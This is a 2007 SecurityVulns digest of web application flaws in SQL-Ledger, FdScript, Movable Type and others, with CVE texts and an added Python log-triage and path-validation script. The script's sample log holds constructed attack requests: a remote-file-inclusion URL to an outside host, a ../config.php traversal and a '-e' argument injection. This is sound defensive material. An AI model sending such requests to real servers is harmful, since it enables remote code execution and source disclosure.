Computer Security


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published: 28.01.2007
Source:
SecurityVulns ID: 7115
Type: remote
Threat Level: 5/10
Description: PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected: SQLLEDGER : SQL-Ledger 2.6
 LOCI : Local Calendar System 1.1
 OPENADS : Max Media Manager 0.1
 OPENADS : Max Media Manager 0.3
 MOVABLETYPES : Movable Type 3.33
 PHPMM : PHP Membership Manager 1.5
 FDSCRIPT : FdScript 1.3
 LEDGERSMB : LedgerSMB 1.1
 OPENCONFERENCE : Open Conference Systems 2.8
CVE: CVE-2007-0860 (** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in local Calendar System 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) TEMPLATE_DIR parameter to (a) showinvoices.php, (b) showmonth.php, (c) showevents.php, (d) retrieveinvoice.php, (e) modifyitem.php, and (f) lookup_userid.php; or the LIBDIR parameter to (g) editevent.php, (h) resetpassword.php, (i) signup.php, showmonth.php, (j) showday.php, showevents.php, and lookup_userid.php. NOTE: this issue has been disputed by a third party, who states that the associated variables are set in config.php before use.)
 CVE-2007-0620 (download.php in FD Script 1.3.2 and earlier allows remote attackers to read source of files under the web document root with certain extensions, including .php, via a relative pathname in the fname parameter, as demonstrated by downloading config.php.)
 CVE-2007-0604 (Cross-site scripting (XSS) vulnerability in Movable Type (MT) before 3.34 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the MTCommentPreviewIsStatic tag, which can open the "comment entry screen," a different vulnerability than CVE-2007-0231.)
 CVE-2007-0567 (Cross-site scripting (XSS) vulnerability in admin.php in Interactive-Scripts.Com PHP Membership Manager 1.5 allows remote attackers to inject arbitrary web script or HTML via the _p parameter.)
 CVE-2006-5872 (login.pl in SQL-Ledger before 2.6.21 and LedgerSMB before 1.1.5 allows remote attackers to execute arbitrary Perl code via the "-e" flag in the script parameter, which is used as an argument to the perl program.)
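The CVE entries above describe three request shapes worth recognising in web logs: a URL in an include-path parameter such as TEMPLATE_DIR or LIBDIR (remote file inclusion), a relative path or .php target in a download parameter such as fname (source disclosure through download.php), and a value beginning with "-" in a parameter that is passed straight to the perl binary, as with the script parameter of login.pl. The Python below is an added example written for this page, not code from SecurityVulns or from any of the projects listed: it triages constructed access-log lines for those shapes and shows the lexical path check a download handler should apply to a user-supplied file name. The hosts, paths and log lines are invented; only the parameter names are taken from the advisories.

```python
# Added example: log-triage heuristics and a hardened file-path check for the
# vulnerability classes summarised above. Illustrative code written for this
# page, not code from SecurityVulns or from any listed project; the log lines,
# hosts and directories are constructed.
import re
import posixpath
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (not real traffic). Parameter names
# follow the advisories: TEMPLATE_DIR (Local Calendar System), fname
# (FdScript download.php) and script (SQL-Ledger/LedgerSMB login.pl).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jan/2007:10:01:02 +0300] "GET /cal/showmonth.php?TEMPLATE_DIR=http://203.0.113.9/inc HTTP/1.0" 200 512
203.0.113.7 - - [28/Jan/2007:10:01:05 +0300] "GET /fd/download.php?fname=../config.php HTTP/1.0" 200 1890
203.0.113.7 - - [28/Jan/2007:10:01:09 +0300] "GET /ledger/login.pl?script=-e HTTP/1.0" 500 0
198.51.100.4 - - [28/Jan/2007:10:02:00 +0300] "GET /fd/download.php?fname=brochure.pdf HTTP/1.0" 200 40122
198.51.100.4 - - [28/Jan/2007:10:02:03 +0300] "GET /cal/showmonth.php?month=1&year=2007 HTTP/1.0" 200 3021
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')
URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
DOTDOT_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify_param(name, value):
    """Label one query parameter, or return None if it looks benign.

    The rules are deliberately broad (triage, not blocking): a URL in any
    parameter is the remote-file-inclusion shape; a '..' segment or a .php
    target is the traversal / source-disclosure shape; a value starting with
    '-' in a parameter that names a script to run is the argument-injection
    shape described for login.pl.
    """
    if URL_RE.match(value):
        return "rfi"
    if DOTDOT_RE.search(value):
        return "traversal"
    if value.lower().endswith(".php"):
        return "source-disclosure"
    if name == "script" and value.startswith("-"):
        return "argv-injection"
    return None


def scan_log(text):
    """Return (ip, path, param, value, label) for every suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so %2e%2e/ is seen as ../ here.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            label = classify_param(name, value)
            if label:
                findings.append((m.group("ip"), parts.path, name, value, label))
    return findings


def safe_download_path(base_dir, fname, denied_ext=(".php", ".inc", ".pl", ".cgi")):
    """Check a user-supplied file name before a download handler opens it.

    Accepts only a relative name whose segments are all real names (no '', '.'
    or '..') and whose extension is not in denied_ext, and returns the absolute
    path under base_dir, or None. The check is purely lexical so it can be
    tested without a filesystem; a real handler should additionally resolve
    symlinks (os.path.realpath) and, better, use an allowlist of published
    files instead of an extension denylist.
    """
    if not fname or "\x00" in fname or fname.startswith(("/", "\\")):
        return None
    segments = re.split(r"[\\/]", fname)
    if any(seg in ("", ".", "..") for seg in segments):
        return None
    if posixpath.splitext(fname)[1].lower() in denied_ext:
        return None
    base = base_dir.rstrip("/")
    full = posixpath.normpath(posixpath.join(base, *segments))
    if not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%-12s %-22s %s=%s  [%s]" % hit)
    print(safe_download_path("/var/www/fd/files", "../config.php"))
    print(safe_download_path("/var/www/fd/files", "brochure.pdf"))
```

Run as-is, the scan flags the three attacking requests and ignores the two benign ones; the path check rejects ../config.php and a bare notes.php while accepting brochure.pdf. Note that the heuristics are intentionally noisy: a legitimate redirect parameter holding a URL or an index.php value will also be flagged, which is acceptable for retrospective review but not for an inline block.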
Original documents:
 trzindan_(at)_hotmail.com, Open Conference Systems = 2.8.2 Remote File Inclusion (28.01.2007)
 sn0oPy.team_(at)_gmail.com, AdMentor (banners) admin SQL injection (28.01.2007)
 trzindan_(at)_hotmail.fr, local Calendar System v1.1 (lcStdLib.inc) Remote File Include (28.01.2007)
 Chris Travers, Full Disclosure: Arbitrary Code Execution in LedgerSMB CVE-2006-5872 (28.01.2007)
 ajannhwt_(at)_hotmail.com, FdScript <= v1.3.2 Remote File Disclosure Vulnerability (28.01.2007)
 Hackers Center Security Group, PHP Membership Manager Cross-Site Scripting Vulnerability (28.01.2007)
 Matteo Beccati, [OPENADS-SA-2007-002] Max Media Manager v0.1.29 and v0.3.30 vulnerability fixed (28.01.2007)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod